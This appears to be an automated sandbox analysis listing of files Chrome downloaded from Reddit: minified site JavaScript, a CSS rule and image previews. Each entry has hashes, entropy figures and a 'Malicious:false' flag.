                                                  Preview:import{N as t,_ as s,n as e,e as o,T as d}from"./shell-4994f581.js";import{s as i,a,x as r}from"./icon-4d9be652.js";const n=t(i),l=new DOMParser;let h=class extends n{constructor(){super(...arguments),this.userId="",this.subredditId="",this.onUpdateFlairEvent=({html:t,subredditId:s,userId:e,isEnabled:o})=>{if(this.userId===e&&this.subredditId===s){const s=t&&o,e=s?t:'<span class="hidden"></span>',d=l.parseFromString(e,"text/html").body.firstChild;d&&(this.shadowRoot?.querySelector("slot")?.assignedElements({flatten:!0})[0].replaceWith(d),s?this.showHost():this.hideHost())}}}static get styles(){return a`:host{--display:flex;display:var(--display);overflow:hidden}`}onSlotChanged(t){const s=t.target?.assignedElements({flatten:!0});s?.some((t=>"SPAN"===t.nodeName&&t.classList.contains("hidden")))&&this.hideHost()}connectedCallback(){super.connectedCallback(),this.subscribe(d.CommunityAuthorFlairUpdated,this.onUpdateFlairEvent)}disconnectedCallback(){super.disconnectedCallback(),this.unsubs
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:downloaded
                                                  Size (bytes):53
                                                  Entropy (8bit):4.335949935491173
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:27A7C95AF5D71FE7E45A57D901586DF8
                                                  SHA1:5942E0FD7A72967A2143EB60E0D47DC3EE4F40D2
                                                  SHA-256:772A0624F58C629A5CE687077340DFE6E35F8C2B7C03B05B8693BCF276BA3AE3
                                                  SHA-512:B3AA36765CC1877C6A347BD7768085F2C75E217B5FDDAEED31CB4AF38725B7F6BDE75A0EDBD06F868AF02C7ADCEF745C23FABDECCDB52CD8CF2FEEFB9553826D
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/header-large-client-css-eee101e8.css
                                                  Preview:click-card:not(:defined) [slot=content]{display:none}
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (1942)
                                                  Category:downloaded
                                                  Size (bytes):1997
                                                  Entropy (8bit):5.16755092264432
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:8043D58FB41DCD09CAA41265151A2DD3
                                                  SHA1:6B4E3E6ED26AA6A27C25B8997543C520F1E4FECD
                                                  SHA-256:1AD0411DB9DB458A1E78A276CBB1E6E75C154EEFB148099744963E8B05B614B9
                                                  SHA-512:477A590842C481522038F9A97BB4F165FA030C71C3C6F97AC2ED0C6559EBA5852A99D634C0CC31BA896FE9519D11DA87BD7590A77C71A5B62ECC825DD5575623
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/ad-event-tracker-a5a98fc1.js
                                                  Preview:import{_ as t,n as e,e as i,ar as r,as as o,at as a}from"./shell-4994f581.js";import{W as s,e as n}from"./with-ad-observer-5931d8eb.js";import{s as d,x as p}from"./icon-4d9be652.js";const l=s(d);let y=class extends l{constructor(){super(...arguments),this.impressionId="0",this.isBlank=!1,this.adType=r.DISPLAY,this.placement=o.BLANK_ONLY,this.isPixelFiringRefactorExperimentEnabled=!1,this._isConnected=!1}connectedCallback(){super.connectedCallback(),this._isConnected||(this.enableAdObserver({postElement:this,adType:this.adType,events:n(this.adEvents),postId:this.postId,impressionId:this.impressionId,dimensions:this.dimensions}),this._isConnected=!0)}disconnectedCallback(){this.adMeasurer&&this.adMeasurer.handleUnload(),super.disconnectedCallback()}render(){return p` <shreddit-with-observer-wrapper .config="${{threshold:a}}"> <slot></slot> </shreddit-with-observer-wrapper> `}};t([e({type:Array,attribute:"ad-events"})],y.prototype,"adEvents",void 0),t([e({type:String,attribute:"post-id"})
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (10493)
                                                  Category:downloaded
                                                  Size (bytes):10537
                                                  Entropy (8bit):5.16294008713596
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:505882052D670F5F4DDDE4114C87A0AA
                                                  SHA1:72934E1B9A9A2FFE90291944BD5B42E824746D47
                                                  SHA-256:7BDD5E96802BC06D782FFED1ACD18D500FC2039FA4FB11E051119F33512BCDCF
                                                  SHA-512:CB6AAA85551428AEB90FDE049A0C006CDFE27EE53734DC4FC67A3B0E93BE86E04C993E73227F8BD4CFAFC1E1B48BA6E55A8641FAF010B6CB8525634388090464
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/index-56e4320e.js
                                                  Preview:import{x as t}from"./icon-4d9be652.js";import{a3 as i}from"./shell-4994f581.js";class e{constructor(t,i){this.element=t,this.touch1=null,this.touch2=null,this.touchStartX=null,this.touchStartY=null,this.touchEndX=null,this.touchEndY=null,this.touchMove1=null,this.touchMove2=null,this.touchMoveX=null,this.touchMoveY=null,this.velocityX=null,this.velocityY=null,this.longPressTimer=null,this.doubleTapTimer=null,this.doubleTapWaiting=!1,this.thresholdX=0,this.thresholdY=0,this.disregardVelocityThresholdX=0,this.disregardVelocityThresholdY=0,this.swipingHorizontal=!1,this.swipingVertical=!1,this.swipingDirection=null,this.swipedHorizontal=!1,this.swipedVertical=!1,this.originalDistance=null,this.newDistance=null,this.scale=null,this.originalAngle=null,this.newAngle=null,this.rotation=null,this.handlers={panstart:[],panmove:[],panend:[],swipeleft:[],swiperight:[],swipeup:[],swipedown:[],tap:[],doubletap:[],longpress:[],pinch:[],pinchend:[],rotate:[],rotateend:[]},this._onTouchStart=this.onTo
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 1080x2340, Suserng: [none]x[none], YUV color, decoders should clamp
                                                  Category:downloaded
                                                  Size (bytes):181504
                                                  Entropy (8bit):7.998418012920484
                                                  Encrypted:true
                                                  SSDEEP:
                                                  MD5:14DBAA303D40C8F66CBB98F2379594AD
                                                  SHA1:0A00F41741DB1FCF111F44DE71FF09AD4D66BC78
                                                  SHA-256:21025B4471B1DE73B1A4BAC5489487DAB0F521766A5C88882553B6EF83CEFDAC
                                                  SHA-512:A483E4FB5DB4228EA1DF87160D6680AB123E505CAAB0B81D5DD656E1C6D29A2BA29FA05990347A6734AEC0C58B0A23DDDFBCD0E38108EF123AFEF5894CA3C1EF
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://preview.redd.it/aio-for-demanding-to-be-paid-after-wearing-something-v0-p3d0wjur1bwe1.jpg?width=1080&crop=smart&auto=webp&s=709b446b98d66153e1035e0509f9a80443313559
                                                  Preview:RIFF....WEBPVP8 ....0....*8.$.>Q&.F#.!.....p..cn....Z....U.l......>5........V.._.......{...y.....3.]......<r...#.#.......|..O.>..S.....O......;...?......k.k...C.?......?.........=.O.......@_........}.3.....o..............?...?....K..........?....*.............}..A............................w.O._......r..._.#......._................?...................i.g.7._.o..{.+...........................?...~=...o._M>..../......G...................?....%...o...?................a...S.......e.%.I..................../......o..........7.O.......?.................S.#.G............9...c......?........?.....?r>...o.....O._............;......../.......Y.......l.{ .e...6.l.{..O..}...........hqS.M.B.m.....X.../[.O..}.... .[.,...c...p.l.~i..*d_.]...q.8:t).:.\1X..0..f...Ax,n.`vJQ.C...!N8...~.{.q.A.e.......8P..R..)..T....r.Z[...*'..WW..E.....`>p.M.T{.(......]./...V..(.....W.J..Au..!K-~2y...sG.......}...[~.#..X.......r.:.....wR.uS:..Zb......"U&...B.."x..W...^....i....nbz.
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (1261)
                                                  Category:downloaded
                                                  Size (bytes):1335
                                                  Entropy (8bit):5.030021188328762
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:F14CE93A5D579A7151746BCF82529B78
                                                  SHA1:C31F5940653274935B9C28CCDFDEC92E38AE73E8
                                                  SHA-256:40CDB22D6D4DF8F087308D215A8D4FE82402E88F9A75C64E176E0072E8F75EC8
                                                  SHA-512:54CF60169B86DB62A426C462015B37504CC1915500FAC52895D045D2655159493338428A07A6999589A4471C6917ABFFCE845554A7A97A18C26018128CF6F414
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/faceplate-expandable-section-helper-f8f3e473.js
                                                  Preview:import{E as t,_ as e,n as i,e as s}from"./shell-4994f581.js";import{s as n}from"./icon-4d9be652.js";let a=class extends n{constructor(){super(...arguments),this.open=!1,this._summaryEvents=new t(this,(()=>this._summary)),this._animatorEvents=new t(this,(()=>this._animator)),this._eventsDefined=!1,this.updated=t=>{t.has("open")&&(this.open&&(this.details.open=!0),this._animator.open=this.open,this._summary.setAttribute("aria-expanded",this.open.toString()))},this._onClick=t=>{t.preventDefault(),this.open=!this.open,this._animator.open=this.open},this._onTransitionEnd=()=>{this.details.open=this.open}}connectedCallback(){super.connectedCallback(),this.details=this.querySelector("details"),this._summary=this.details.querySelector("summary"),this._animator=this.querySelector("faceplate-auto-height-animator"),null!=this.details&&null!=this._summary&&null!=this._animator&&(this._eventsDefined||(this._summaryEvents.define("click",this._onClick),this._animatorEvents.define("transitionend",this
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (3618)
                                                  Category:downloaded
                                                  Size (bytes):3667
                                                  Entropy (8bit):5.076203295991888
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:51C1FE54F94B8ECF372AC46F596B667C
                                                  SHA1:32888CCF512D64354986E562E56845D807543225
                                                  SHA-256:7D3792CF358A43FEAFB29C7082DE13DF0154FA4A4096B64E9F475294B9E07834
                                                  SHA-512:A7FB9586CD32A9DF7DA04D84EBECEA3A4FB57CF9FD3C262C930431C358CB2F709093A0786797EF9BEA02C157E50BFF71550699697F103B0372696107CAF1504F
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/click-card-32ea2f71.js
                                                  Preview:import{_ as t,n as e,e as o}from"./shell-4994f581.js";import{F as s,l as i,s as r}from"./faceplate-hovercard-74cbfc29.js";import{x as l,l as n}from"./icon-4d9be652.js";let a=class extends s{constructor(){super(...arguments),this.tooltipStyle="",this.scrollContainerSelector="",this.customGlobalCloseEvent="",this.triggerEvent="click",this.addListenersWhileOpened2=()=>{document.addEventListener("click",this.handleDocumentClick2),document.addEventListener("keydown",this.handleEscape),this.customGlobalCloseEvent&&document.addEventListener(this.customGlobalCloseEvent,(()=>this.close())),this.scrollRoot?.addEventListener("scroll",this._popperController.reposition),this.setupScrollOutOfViewHandler()},this.cleanupListenersWhileOpened2=()=>{document.removeEventListener("click",this.handleDocumentClick2),document.removeEventListener("keydown",this.handleEscape),this.customGlobalCloseEvent&&document.removeEventListener(this.customGlobalCloseEvent,(()=>this.close())),this.scrollRoot?.removeEventLis
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (6101)
                                                  Category:downloaded
                                                  Size (bytes):6167
                                                  Entropy (8bit):5.136789441948701
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:9A40DAEBE353A4FCBAA1A8B0F95E1068
                                                  SHA1:6D988D4832837EE36D18D4C8CF9A90D1154EDCD2
                                                  SHA-256:C1FD42C56C4AA48476CFB3136D7AAAEDBFA9B2FFEFB93B804B0551E23A609892
                                                  SHA-512:8CD6DD290D7FEEAF0CEDD79A310C83E79001059E413DA929A72AB99BC80F0A9E397453C62FF17147338D8AFF7B2F4CF2D362D9615FD732A0B41D2ADAA0F84F71
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/faceplate-select-text-input-a2370973.js
                                                  Preview:import{_ as e,n as t,am as i,I as a,e as s,aY as l,aS as r}from"./shell-4994f581.js";import{c as o}from"./index-169ed00b.js";import{x as n,l as p,O as h,a as d}from"./icon-4d9be652.js";import{S as c}from"./select-controller-fa3db659.js";import"./faceplate-dropdown-menu-f991e0ba.js";import{F as u}from"./filterNullish-3e68f24c.js";import{T as v}from"./validate-image-fc8b467a.js";let m=class extends u{constructor(){super(...arguments),this.appearance=v.SECONDARY,this.label="",this.clearable=!1,this.multiple=!1,this.required=!1,this.helperTextLevel=null,this.helperTextPlaceholder="",this.helperTextAriaLive="polite",this.helperTextMessage="",this.readonly=!1,this.inputRef=l(),this._selectController=new c(this),this.focus=()=>{this.inputRef.value?.focus()},this.syncInputValidation=(e=!1)=>{const t=this.options.map((e=>e.value)),i=this.inputRef?.value?.value,a=this.value||this.arbitrary&&i||!this.arbitrary&&t.includes(i);if(this.required&&!a){const t=this.inputRef?.value?._internals.validatio
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (3088)
                                                  Category:downloaded
                                                  Size (bytes):3150
                                                  Entropy (8bit):5.320649860855595
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:699F0DE738968542FF61C7E0EDE7B4E7
                                                  SHA1:C5488B8B713BB3E0DBAC6865E3D929256241A7F2
                                                  SHA-256:65918D23EB2B95A7121D2001328A11B3377492D9D9D5EBB008231B9DD0DC0AAD
                                                  SHA-512:AD4202D26B446048D48BB693C98CD39ECE58593B366DA7E972063D850CA983D5F4F14E9CCB252170557A236013B8804DCEF3A093617C77FCBC024E3F75B0A678
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/w3-report-from-v2-event-92975fc1.js
                                                  Preview:import{b0 as o,bz as e,bA as a,bj as r,bB as n}from"./shell-4994f581.js";import{B as s}from"./xpromo-c45d37b6.js";import{A as t}from"./helpers-82480d34.js";import"./icon-4d9be652.js";import"./club-award-confirmation-client-js-b22d6f4f.js";const c={[s.Back]:"secondary_cta",[s.Close]:"dismiss",[s.GetApp]:"primary_cta",[s.Login]:"secondary_cta",[s.Signup]:"secondary_cta",[s.DontShowAgain]:"dismiss"},i={[s.Login]:"primary_cta",[s.NotOver18]:"secondary_cta",[s.Over18]:"secondary_cta",[s.Back]:"dismiss"},p={[t.LOGIN]:"secondary_cta",[t.SIGNUP]:"secondary_cta",[t.OPEN_APP]:"primary_cta",[t.GOOGLE_SSO]:"primary_cta",[t.APPLE_SSO]:"primary_cta",[t.EMAIL]:"secondary_cta",[t.CLOSE]:"dismiss"},_="unknown";function m(s){const t=o(s),m=e()===a.Desktop,d=[];switch(t){case"global/view/screen":s.action_info?.trigger_type===n.Initial&&d.push({name:"shreddit_page_views",type:r.Counter,value:1});break;case"xpromo/view/app_selector":case"xpromo/view/bottom_bar":case"xpromo/view/marketplace_community_launch
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 640x791, Suserng: [none]x[none], YUV color, decoders should clamp
                                                  Category:downloaded
                                                  Size (bytes):19788
                                                  Entropy (8bit):7.9909896356952235
                                                  Encrypted:true
                                                  SSDEEP:
                                                  MD5:0BCD1D31A11E0048FB552589A7BF93CF
                                                  SHA1:CC3E900C1E5CECAB314E8DB4898B2949D75ACF05
                                                  SHA-256:FC27434DDCDD135B351B84F11DF76DD9F81D83C7E19D7E597ABB27F9495A5B7B
                                                  SHA-512:E5006A6FEF5E28A35B22A95DA3A5E1BF0D09036A221B10F12E5CC1B2446EB208C1A7787924E1E8B1D37F8B0638E23939588BC825B46B22942A5BF1D88E0CA20C
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://external-preview.redd.it/the-doors-to-late-pope-francis-apartments-have-been-sealed-v0-eW1lcWRicThsZHdlMfZRaVTbfdeKD8KMLOP5areSuNW1WAtKhBFVc40zLjBK.png?width=640&crop=smart&format=pjpg&auto=webp&s=17215cf6d0ae6998d3a6e3828afd6f6b3fadf084
                                                  Preview:RIFFDM..WEBPVP8 8M...F...*....>Q&.F#.))%.i. ..g9R.T.O.^r..[...H.f.e...p......Y~dY....|..o.o.~c............N......yw...q..:.G......V#m)...ldy...a8P...O5W.....%.$.U..{...*Cm.N....W.c1:.l5Z._.....$...+..m......V...3D.......].#s...;.R\..vz.........z]KR..;.PQm.....`..s....I../.D.M...C4)U............2..j.......[.a..}E.n_dBM+WM....... kF...8.XX.Ux.WG!..!... ...X....5.......X.....#.rn,f...^......'......Y......N...}.C..Z..+....;.&......-C{#T..x...74..m.o.VZI.].t..o....,fg.c.P ..u.O=&.hz[...Zp.]`h..9..-.dE .[pw59.............[.%........E....h.....:.O..g.(."4.jk..uw..@w.T.S.`...l....C....P........A...1>..iA.2...(.~F.....N.;...8.I..!0..e..@..].SVL..MpV/.w*........`"..."~...#>...Va.O.Off!.......7.5.O.}3n2-(.Q.......Of."X]..m.O.D.?..7..3.^.>3`....-...0...........)_.%..5..)g.......--.jp*..l.B.........Q.,7t2..A..G...dU.../.v>.=...s....><.1/..S.&...5..F....t..m....?...._+.....5.s8..C83..... .f....W@.:.TC._$.[.7..........f.........L...#........R....f.
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (2164)
                                                  Category:downloaded
                                                  Size (bytes):2220
                                                  Entropy (8bit):4.942969782901756
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:E819176299EE0D38907BBD667F8F733A
                                                  SHA1:4F2C2562E78A716D169492323E202FE13A2356B2
                                                  SHA-256:4E1CD0A9ACEB56364E49B95781AF749B75C63A034208EF746483CD16ED52C1C0
                                                  SHA-512:A9E6FF661C39E4BD64DABAD1939CEB62A0173F9DF5E3A8DA643533010FAEEDEF631A0EA358063A2DF90BC3E151342B61C84448174C8C94FAEAB5EB90F3A74965
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/feed-ad-client-js-b90fbf7b.js
                                                  Preview:import"./trend-page-client-js-f8d9bc80.js";import"./pdp-ad-client-js-d703e7d3.js";import"./shell-4994f581.js";import"./icon-4d9be652.js";import"./activate-lead-gen-dialog-5e20bf34.js";import"./click-location-tracker-32ee9eb3.js";import"./club-award-confirmation-client-js-b22d6f4f.js";import"./shreddit-dynamic-ad-link-fcaf1820.js";import"./with-ad-observer-5931d8eb.js";import"./ssa-parser-f2f362d6.js";import"./errors-98e883e2.js";import"./overflow-menu-actions-fd509c7d.js";import"./distinguished-tags-28b29a34.js";import"./content-action-button-5fdf727f.js";import"./partial-feed-post-client-js-9de4a8bc.js";import"./mod-log-takedown-preview-client-js-13462cf3.js";import"./shop-gallery-data-fetcher-client-js-a66aa4d3.js";import"./number-68db534b.js";import"./faceplate-shimmer-252a0dfd.js";import"./index-e2ec7e4b.js";import"./award-controller-7d9d8182.js";import"./awardsTelemetryState-36bf2914.js";import"./modActions-7666e3bf.js";import"./awards-d066f3fe.js";import"./rpl-tooltip-958cc522.js
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (4342)
                                                  Category:downloaded
                                                  Size (bytes):4405
                                                  Entropy (8bit):5.241686452311988
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:48301A34E6EBF2BD93E2A42481FB5617
                                                  SHA1:65B02B28D21D8036CBD19EF5590A03BA5D177A18
                                                  SHA-256:17056935E15E88DD2A322E7E5685A0E9ACCFB7D5A122E5B2250A6F081134809A
                                                  SHA-512:8DF2D93D29A89074582A68C1E196B8E48180E7DEF879D37853A9A09F4EFDCCC9CEA1D8CEBEFF3E3678340F030648F40DC0D47816F2EB861AA0DB11C89DD8126C
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/faceplate-textarea-input-ab5075d8.js
                                                  Preview:import{_ as e,n as t,I as r,e as a,aY as i,aS as n,a3 as o}from"./shell-4994f581.js";import{a as s,x as l,l as h}from"./icon-4d9be652.js";import{B as d}from"./club-award-confirmation-client-js-b22d6f4f.js";import{T as p}from"./text-input-1c750feb.js";var c,u;!function(e){e.BORDERED="bordered",e.SECONDARY="secondary",e.PLAIN="plain"}(c||(c={})),function(e){e.COLLAPSED="collapsed",e.EXPANDED="expanded"}(u||(u={}));let x=class extends p{constructor(){super(...arguments),this.appearance=c.SECONDARY,this.size=u.COLLAPSED,this._textAreaContainerRef=i()}static get styles(){return[super.styles,s`:host(){--trailing-icons-container:var(--rem32)}:host([resize]) .label-container{overflow:auto}.label-container:not(.without-label){padding-top:var(--spacer-xs);padding-bottom:var(--spacer-xs)}:host([resize]) textarea{height:100%;width:100%}:host([resize=both]) .label-container{resize:both}:host([resize=horizontal]) .label-container{resize:horizontal}:host([resize=vertical]) .label-container{resize:ver
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text
                                                  Category:downloaded
                                                  Size (bytes):230
                                                  Entropy (8bit):4.979558476636411
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:6339D3A12EB6FB78CFC3E5365D4625AF
                                                  SHA1:40F98655543692E2172E402D628011449DBCD124
                                                  SHA-256:E7CF40532947017AA334BE52F73F3EDEC2728FD06FB6485439EE0953FBE29D3D
                                                  SHA-512:804629BA9D993376A559ADEA1C52355C29523E602C1AE7B43036CB2B41EA9A049496540B470271986DF18D06C3DBE37DF3D16FE4294CA0BE3C9F082EE990957F
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/left-nav-topics-section-client-js-c3c87bfd.js
                                                  Preview:import"./left-nav-topic-tracker-bdb15252.js";import"./shell-4994f581.js";import"./faceplate-expandable-section-helper-f8f3e473.js";import"./icon-4d9be652.js";.//# sourceMappingURL=left-nav-topics-section-client-js-c3c87bfd.js.map.
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (1383)
                                                  Category:downloaded
                                                  Size (bytes):1444
                                                  Entropy (8bit):5.193724378977522
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:5A13138BA55EE54DCB237F58F4CA3512
                                                  SHA1:F629F20B063F0FFF7D57992DADC98B8086EEC7FC
                                                  SHA-256:1B30104BDB701E82F226011B3F2918C8AC12968F92C34870C31980EE0FDF021D
                                                  SHA-512:EC018C3CD2215B2716AEA6823FA8A5E0ADF21D61EF3F2CD635E5CDBCA978834B18C296C9DD14566E3D80513E69516ECD7B871C6A4D0DF608B731146FF3F8C699
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/reddit-skip-to-sidebar-dfe7d725.js
                                                  Preview:import{ae as t,t as e,_ as i,e as n}from"./shell-4994f581.js";import{a as r}from"./ui-strings-aad5fab2.js";import{F as s}from"./flex-left-nav-container-c40bb411.js";import{F as o}from"./flex-nav-2ca2e7d8.js";import{s as a,x as l}from"./icon-4d9be652.js";import"./club-award-confirmation-client-js-b22d6f4f.js";let c=class extends a{constructor(){super(...arguments),this.handleNavigationClick=(e,i)=>{if(e.preventDefault(),e.stopPropagation(),"left"===i&&d(this.leftSidebar))return this.leftSidebar.focusContents();const n="left"===i?this.leftSidebar:this.rightSidebar;if(n){const e=t(n);e?e.focus():n.focus()}}}connectedCallback(){super.connectedCallback();const t=document.getElementById(o.LeftSidebarContainer);t&&(this.leftSidebar=t);const e=document.getElementById("right-sidebar-container");e&&(this.rightSidebar=e)}render(){return l`${this.leftSidebar?l`${r({attributes:{href:"#left-sidebar-container",onclick:t=>this.handleNavigationClick(t,"left"),className:"sr-only focus:not-sr-only hidden
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:JPEG image data, baseline, precision 8, 320x180, components 3
                                                  Category:dropped
                                                  Size (bytes):13905
                                                  Entropy (8bit):7.962068064177469
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:658761A1FC37E9F72E05D67CEE5D26F1
                                                  SHA1:2CB4B70EC5EE51F6257E7ACAB4E95A7D6E5CFFD9
                                                  SHA-256:473528E797781B22BCDDE26D6FE92852116447281740B0E9C034F683EF744167
                                                  SHA-512:123A1DF5C801E038E48736F2A80CE268661087B7A50491208DF9A9E70ACDCF8CFBE54605FDDC6455C5B7D642A634C888DFED538F08579B03C1C407DE5EC20F2E
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:.....C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}........@..".........................................Q..........................!1.."AQa.q..23Rr.....#$4BCbs......%ST...Dcd.&5Ee..Uu.................................;........................!1A.Qq."2a.......$BRb...#3Sr..Dc.............?.........u.(.i.I..r....B.....).L.f.vjd....)...._...*y.V.....S[...1...`..T.L...#...z..9M@].G........./5.<)....v...4f..y.6.....++....uXCr.[..,f.b.`.g.V.. Fa."....S.J.. .@.x7@........~..Qm...I.$.:L.*z...g..Fp....o%..YYVI...zA....<.]...Z.....3..O=...{.....`v*........t.W.si..........%.-..B...IZ.KM....e..y...i...a894b.uyqY'.4...>S.4.w8.....Tp.;8..@....Fs.'.-.OS...u.....B.V...)B......-.<8...u.....{kJ...1....*.u.q...{.m<.\AJ.J...{S.......z[{Nv....R.uG..j|!yh..@.|D.$..k.....GQ%.Kmr.[...{...O...-..R_B.\K........{Txq....'.}..k....[...Pxf.:`T..V{.Km.\"owg%.....2...........ew.?).G<..Mk...x.$c.r|MI!...
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (2946)
                                                  Category:downloaded
                                                  Size (bytes):3003
                                                  Entropy (8bit):5.1987732707722865
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:3BF49F735ACAD02CE05B692676692C47
                                                  SHA1:BFD1A01EB6A5EDAF1C6E98149B391825E53FB1EF
                                                  SHA-256:33AA36894FC99F24BF854A012692C56AAD57CC9F1A6B73CEABB7E5590903F38E
                                                  SHA-512:0F7148624A942B9C4BE93E8A598168276D1B5294F088C9AFC04DEDFD4F3E0E786C87647A814CD18BD5476761C91A3EECC60A0BF98146E57312675AF9746795A2
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/rpl-coachmark-card-556887f7.js
                                                  Preview:import{_ as t,n as e,b8 as o,Y as s,e as l}from"./shell-4994f581.js";import{x as a,a as r}from"./icon-4d9be652.js";import{M as i}from"./club-award-confirmation-client-js-b22d6f4f.js";const n="title-icon",d="close-button",c="primary-button",h="secondary-button",m="tertiary-button";class p extends o{constructor(){super(...arguments),this.appearance="neutral",this.autoClose=!1,this.emitCloseButtonClickEvent=()=>{this.emitter.dispatch("close-button-clicked",{bubbles:!0,composed:!0})},this.handleCloseButtonClick=t=>{this.autoClose&&this.emitCloseButtonClickEvent()},this.handleCloseButtonKeydown=t=>{this.autoClose&&"Enter"===t.key&&this.emitCloseButtonClickEvent()}}render(){const t=i(this,n),e=i(this,d),o=i(this,c),s=i(this,h),l=i(this,m),r=o||s||l;return a`<div> <slot name="${"title-graphic"}"></slot> <div class="main"> <div class="content"> <div class="title-row"> <slot name="${n}" class="${t?"has-slotted":""}"></slot> <slot name="${"title"}"></slot> <slot name="${d}" part="close-button" c
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (2920)
                                                  Category:downloaded
                                                  Size (bytes):2973
                                                  Entropy (8bit):5.327836883119527
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:63F431C2EFB3E279D28AC9E7A600A82F
                                                  SHA1:F0BBADAB7337E4312A0009454F24F22D0CF753C5
                                                  SHA-256:FD3D66ADD521D8A20F59926E02E7612E661415298B28C9993FAE580210EFFA51
                                                  SHA-512:62D0B81C8E04C87DC6792ADAF035EDEC198DED8DB3F5DF58D3E206F6FD8A9AA23E1F2E0A39B65CACF804340BA63E9D1A627B63995E9114AF7354F63898B8F835
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/scroll-blocker-9486e9a9.js
                                                  Preview:import{bE as e,c as t,H as o}from"./shell-4994f581.js";import{x as n}from"./icon-4d9be652.js";const s="wheel",l="touchmove",d="scroll-is-blocked";function a(e){e.preventDefault()}function r(e){e.stopPropagation()}class c extends e{constructor(){super(...arguments),this.blockedSources=new Set([])}get shredditApp(){return document.querySelector("shreddit-app")}get isDebugEnabled(){return this.shredditApp?.hasAttribute("debug")}preventOverscrollOnBody(){document.body.classList.contains(d)||document.body.classList.add(d)}allowOverscrollOnBody(){document.body.classList.remove(d)}preventEventOnNode(e,t){t.addEventListener(e,a,{passive:!1})}allowEventOnNode(e,t){t.removeEventListener(e,a)}stopEventPropagationOnNode(e,t){t.addEventListener(e,r,{passive:!1})}allowEventPropagationOnNode(e,t){t.removeEventListener(e,r)}rafOrYOLO(e){requestAnimationFrame?requestAnimationFrame(e):e()}applyBlocking(){return new Promise((e=>{this.rafOrYOLO((()=>{const t=new Set,o=new Set;for(const e in c.CURRENT_SCRO
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (4219)
                                                  Category:downloaded
                                                  Size (bytes):4294
                                                  Entropy (8bit):5.31470587794866
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:2D20F4462F7193A0220CDCFAF15868EB
                                                  SHA1:E3505F009558E58D4B1CC4681D8EA6AE289C43DD
                                                  SHA-256:250BAE671E6E7A250FB39A308855D8C83DAD84F23836BCC0FEA723CB136A519B
                                                  SHA-512:5251F68F0C677DDF5433BBFA73EA78EB2B1FE011AE2690714D99836BF9BB5B22662FE17010A4F210EA83CAB9CFE49ED62B3D0A297B269149982EFF71EF856D9C
                                                  Malicious:false
                                                  Reputation:unknown
